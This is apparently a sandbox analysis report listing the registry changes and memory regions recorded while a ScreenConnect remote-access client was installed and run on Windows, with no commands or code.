HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files
|
ScreenConnect.WindowsClient.exe_6492277df2db17d2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files
|
ScreenConnect.WindowsClient.exe_6492277df2db17d2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files
|
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files
|
ScreenConnect.Windows.dll_fc0d83aff7df0b5b
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Files
|
ScreenConnect.Core.dll_b96889d378047e27
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Files
|
ScreenConnect.Core.dll_b96889d378047e27
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
DigestMethod
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Files
|
ScreenConnect.Client.dll_fc1d7bd48553fcab
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Files
|
ScreenConnect.Client.dll_fc1d7bd48553fcab
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
SizeOfStronglyNamedComponent
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
DigestValue
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
Transform
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files
|
ScreenConnect.ClientService.dll_e781b1c636f7bfae
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files
|
ScreenConnect.ClientService.dll_e781b1c636f7bfae
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment
|
OnlineAppQuotaUsageEstimate
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
lock!1000000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
lock!0e00000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
lock!0c00000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
lock!0a00000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
lock!0800000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
lock!0600000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
lock!0400000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
identity
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
PreparedForExecution
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
lock!1100000025a17c0b0c1e00003c1e00000000000000000000f8d2619ae32bdb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.ClientService.exe_5e8c1e841cd8db20
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsBackstageShell.exe_89b7a517a15abfdc
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsFileManager.exe.config_5db10293a642be8a
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsClient.exe.config_432322067acab5c0
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsBackstageShell.exe.config_bc78256f1e952942
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files
|
ScreenConnect.WindowsFileManager.exe_74b82db4db38179e
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\Files
|
ScreenConnect.ClientService.dll_5e8c1e5c1cd8d9ee
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\Files
|
ScreenConnect.WindowsClient.exe_fd0fcfe1fd1a6cd2
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Files
|
ScreenConnect.Core.dll_963930cc5ced28c7
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Files
|
ScreenConnect.Client.dll_7b0ea606092ddbcb
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\Files
|
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
SubstructureCreated
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
|
Blob
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
lock!0e000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
lock!0c000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
lock!0a000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
lock!08000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
lock!06000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
lock!04000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
lock!02000000b7775e00581c00007414000000000000000000003aa2b54e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9
|
lock!1c000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd
|
lock!1a000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9
|
lock!18000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6
|
lock!16000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924
|
lock!14000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445
|
lock!12000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28
|
lock!10000000c6775e00581c00007414000000000000000000008112b84e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
lock!1d000000e6775e00581c000074140000000000000000000050f5bc4e312adb01
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_1bac53f2fcbb97b7
|
LastRunVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_d3d1911171305958
|
LastRunVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
|
LastRunVersion
|
||
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd
|
HasRunBefore
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (5999b697-2fc8-47f6-a1dc-4d0d274c363e)
|
NULL
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
|
AutoBackupLogFiles
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
|
EventMessageFile
|
||
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (5999b697-2fc8-47f6-a1dc-4d0d274c363e)
|
ImagePath
|
There are 155 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7FFEB89E0000
|
trusted library allocation
|
page execute and read and write
|
||
CE5000
|
heap
|
page read and write
|
||
227BD150000
|
remote allocation
|
page read and write
|
||
261000
|
unkown
|
page write copy
|
||
267EA88A000
|
heap
|
page read and write
|
||
1406000
|
trusted library allocation
|
page execute and read and write
|
||
17F979F0000
|
heap
|
page read and write
|
||
267EA82B000
|
heap
|
page read and write
|
||
212A1883000
|
heap
|
page execute and read and write
|
||
1B51E000
|
stack
|
page read and write
|
||
AB22C34000
|
stack
|
page read and write
|
||
ED5DDFE000
|
stack
|
page read and write
|
||
46AE000
|
stack
|
page read and write
|
||
4E00000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8999000
|
trusted library allocation
|
page read and write
|
||
DCE000
|
stack
|
page read and write
|
||
ACA000
|
heap
|
page read and write
|
||
1BE40000
|
trusted library allocation
|
page read and write
|
||
7FFEB8896000
|
trusted library allocation
|
page read and write
|
||
14C0000
|
trusted library allocation
|
page execute and read and write
|
||
C40000
|
trusted library allocation
|
page read and write
|
||
ED5DCFE000
|
stack
|
page read and write
|
||
24F9463F000
|
heap
|
page read and write
|
||
24F94613000
|
heap
|
page read and write
|
||
227B8002000
|
heap
|
page read and write
|
||
7FFEB881B000
|
trusted library allocation
|
page execute and read and write
|
||
212BC110000
|
heap
|
page read and write
|
||
212A3976000
|
trusted library allocation
|
page read and write
|
||
2217044C000
|
heap
|
page read and write
|
||
7FFEB8803000
|
trusted library allocation
|
page read and write
|
||
227B8EF7000
|
heap
|
page read and write
|
||
24F94E02000
|
trusted library allocation
|
page read and write
|
||
2A4E000
|
stack
|
page read and write
|
||
227B789B000
|
heap
|
page read and write
|
||
2F20000
|
heap
|
page execute and read and write
|
||
7FFEB8A10000
|
trusted library allocation
|
page read and write
|
||
1710000
|
trusted library allocation
|
page read and write
|
||
24F94681000
|
heap
|
page read and write
|
||
16FD000
|
trusted library allocation
|
page execute and read and write
|
||
2E2E000
|
stack
|
page read and write
|
||
212BBF80000
|
heap
|
page read and write
|
||
CF61E7E000
|
unkown
|
page readonly
|
||
D80000
|
heap
|
page read and write
|
||
212A36CA000
|
trusted library allocation
|
page read and write
|
||
CF624FE000
|
stack
|
page read and write
|
||
1F8A4E38000
|
heap
|
page read and write
|
||
212BD671000
|
heap
|
page read and write
|
||
212BD620000
|
heap
|
page read and write
|
||
212BEE60000
|
heap
|
page read and write
|
||
5400000
|
unkown
|
page readonly
|
||
267EA720000
|
heap
|
page read and write
|
||
D6E000
|
stack
|
page read and write
|
||
231E000
|
trusted library allocation
|
page read and write
|
||
4D5D000
|
stack
|
page read and write
|
||
1BAA0000
|
heap
|
page read and write
|
||
9AF01FE000
|
stack
|
page read and write
|
||
24F9465E000
|
heap
|
page read and write
|
||
7FFEB880B000
|
trusted library allocation
|
page execute and read and write
|
||
F43ABFE000
|
unkown
|
page readonly
|
||
212BBFB0000
|
heap
|
page read and write
|
||
227B9000000
|
trusted library allocation
|
page read and write
|
||
212BD520000
|
heap
|
page read and write
|
||
7FFEB884C000
|
trusted library allocation
|
page execute and read and write
|
||
1412000
|
trusted library allocation
|
page read and write
|
||
227B8E91000
|
heap
|
page read and write
|
||
13041000
|
trusted library allocation
|
page read and write
|
||
227BD150000
|
remote allocation
|
page read and write
|
||
9AEFCEC000
|
stack
|
page read and write
|
||
7FFEB87FD000
|
trusted library allocation
|
page execute and read and write
|
||
CF6307E000
|
unkown
|
page readonly
|
||
DE0000
|
heap
|
page read and write
|
||
212A15E0000
|
trusted library allocation
|
page read and write
|
||
107F000
|
stack
|
page read and write
|
||
7FFEB8A66000
|
trusted library allocation
|
page read and write
|
||
17F994A0000
|
heap
|
page read and write
|
||
212A348D000
|
trusted library allocation
|
page read and write
|
||
227B8391000
|
trusted library allocation
|
page read and write
|
||
7FFEB8AB0000
|
trusted library allocation
|
page read and write
|
||
7FFEB89E6000
|
trusted library allocation
|
page read and write
|
||
12FF000
|
heap
|
page read and write
|
||
9A0000
|
heap
|
page read and write
|
||
1B493000
|
heap
|
page read and write
|
||
CF6177E000
|
unkown
|
page readonly
|
||
32BE000
|
stack
|
page read and write
|
||
212BBFA0000
|
heap
|
page read and write
|
||
212A1A60000
|
heap
|
page read and write
|
||
CCF000
|
heap
|
page read and write
|
||
CF61A7E000
|
unkown
|
page readonly
|
||
227B7827000
|
heap
|
page read and write
|
||
7FFEB89B0000
|
trusted library allocation
|
page read and write
|
||
267EA900000
|
heap
|
page read and write
|
||
1740000
|
trusted library allocation
|
page read and write
|
||
7FFEB89D0000
|
trusted library allocation
|
page execute and read and write
|
||
CF61FFE000
|
stack
|
page read and write
|
||
1F8A5602000
|
trusted library allocation
|
page read and write
|
||
F43B4FE000
|
unkown
|
page readonly
|
||
24F94662000
|
heap
|
page read and write
|
||
1B410000
|
heap
|
page read and write
|
||
12A51000
|
trusted library allocation
|
page read and write
|
||
7FFEB8999000
|
trusted library allocation
|
page read and write
|
||
7FFEB8900000
|
trusted library allocation
|
page execute and read and write
|
||
A40000
|
heap
|
page read and write
|
||
1F8A4DC0000
|
trusted library allocation
|
page read and write
|
||
5C00000
|
heap
|
page read and write
|
||
7FFEB8A50000
|
trusted library allocation
|
page read and write
|
||
7FFEB8AF0000
|
trusted library allocation
|
page read and write
|
||
AFE000
|
heap
|
page read and write
|
||
7FFEB8B90000
|
trusted library allocation
|
page read and write
|
||
24F944F0000
|
heap
|
page read and write
|
||
1F8A4E13000
|
heap
|
page read and write
|
||
227B8EDB000
|
heap
|
page read and write
|
||
7FFEB8AD0000
|
trusted library allocation
|
page read and write
|
||
22170513000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
ABC000
|
heap
|
page read and write
|
||
212BD6C3000
|
heap
|
page read and write
|
||
5DFB000
|
stack
|
page read and write
|
||
EED000
|
stack
|
page read and write
|
||
CF6147C000
|
stack
|
page read and write
|
||
227B7883000
|
heap
|
page read and write
|
||
212A32B0000
|
trusted library allocation
|
page read and write
|
||
9CD41FE000
|
unkown
|
page readonly
|
||
1B429000
|
heap
|
page read and write
|
||
7FFEB8A90000
|
trusted library allocation
|
page read and write
|
||
24F946A0000
|
heap
|
page read and write
|
||
7FFEB8B40000
|
trusted library allocation
|
page read and write
|
||
7FFEB8BF0000
|
trusted library allocation
|
page execute and read and write
|
||
227B88E0000
|
trusted library allocation
|
page read and write
|
||
CF6227E000
|
unkown
|
page readonly
|
||
7FFEB87E3000
|
trusted library allocation
|
page execute and read and write
|
||
7FFEB8800000
|
trusted library allocation
|
page read and write
|
||
61BE000
|
stack
|
page read and write
|
||
227B810C000
|
heap
|
page read and write
|
||
18D22FE000
|
stack
|
page read and write
|
||
F43B0FE000
|
unkown
|
page readonly
|
||
1402000
|
trusted library allocation
|
page read and write
|
||
2F81000
|
trusted library allocation
|
page read and write
|
||
7FFEB8AA0000
|
trusted library allocation
|
page read and write
|
||
5950000
|
trusted library allocation
|
page read and write
|
||
16B0000
|
trusted library section
|
page read and write
|
||
1B32E000
|
stack
|
page read and write
|
||
227B8ED6000
|
heap
|
page read and write
|
||
7FFEB8A20000
|
trusted library allocation
|
page read and write
|
||
F43ACFE000
|
stack
|
page read and write
|
||
24F94624000
|
heap
|
page read and write
|
||
227B8E00000
|
heap
|
page read and write
|
||
22170C00000
|
heap
|
page read and write
|
||
227B8EFD000
|
heap
|
page read and write
|
||
13ED000
|
trusted library allocation
|
page execute and read and write
|
||
AB2347D000
|
stack
|
page read and write
|
||
37CE000
|
stack
|
page read and write
|
||
212B33D2000
|
trusted library allocation
|
page read and write
|
||
9B0000
|
heap
|
page read and write
|
||
7FFEB880D000
|
trusted library allocation
|
page execute and read and write
|
||
267EA780000
|
trusted library allocation
|
page read and write
|
||
267EA800000
|
heap
|
page read and write
|
||
2E70000
|
trusted library allocation
|
page read and write
|
||
1B4C7000
|
heap
|
page read and write
|
||
267EA813000
|
heap
|
page read and write
|
||
212A3A4E000
|
trusted library allocation
|
page read and write
|
||
17F979E0000
|
heap
|
page read and write
|
||
AB2357E000
|
stack
|
page read and write
|
||
227B8113000
|
heap
|
page read and write
|
||
2A40000
|
heap
|
page execute and read and write
|
||
4C60000
|
trusted library allocation
|
page read and write
|
||
CF61D7B000
|
stack
|
page read and write
|
||
12E9000
|
heap
|
page read and write
|
||
7FFEB8814000
|
trusted library allocation
|
page read and write
|
||
AB2327D000
|
stack
|
